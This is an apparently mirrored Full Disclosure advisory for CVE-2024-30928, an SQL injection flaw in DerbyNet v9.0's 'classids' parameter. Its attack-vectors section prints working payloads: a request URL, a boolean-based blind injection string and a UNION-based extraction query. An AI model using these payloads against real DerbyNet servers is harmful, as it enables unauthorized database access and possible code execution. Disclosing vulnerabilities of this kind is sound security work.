CVE-2024-30928: SQL Injection Vulnerability in DerbyNet v9.0 via 'classids' Parameter
2024-4-6 00:36:12 Author: seclists.org(查看原文) 阅读量:9 收藏

fulldisclosure logo

Full Disclosure mailing list archives


From: Valentin Lobstein via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 03 Apr 2024 18:38:51 +0000

CVE ID: CVE-2024-30928

Description:
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the 
`ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose 
sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This 
parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL 
Injection.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: ajax/query.slide.next.inc

Attack Type: Remote

Impacts:
- Code execution: True
- Information Disclosure: True

Attack Vectors:
The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the 
`ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code 
through this parameter. Example attack vectors include:

- Direct exploitation:
- `http://127.0.0.1:8000/action.php?query=slide.next&mode=racer&classids=1`

- Boolean-based blind SQL Injection:
- Payload: `query=slide.next&mode=racer&classids=1) AND 4365=4365 AND (6880=6880`

- UNION query SQL Injection:
- Payload: `query=slide.next&mode=racer&classids=-3890) UNION ALL SELECT 
NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL--
 rDzQ`

These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database 
information unauthorizedly.

Discoverer: Valentin Lobstein

References:
- Official website: http://derbynet.com
- Source code on GitHub: https://github.com/jeffpiazza/derbynet
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread:

  • CVE-2024-30928: SQL Injection Vulnerability in DerbyNet v9.0 via 'classids' Parameter Valentin Lobstein via Fulldisclosure (Apr 05)

文章来源: https://seclists.org/fulldisclosure/2024/Apr/14
如有侵权请联系:admin#unsafe.sh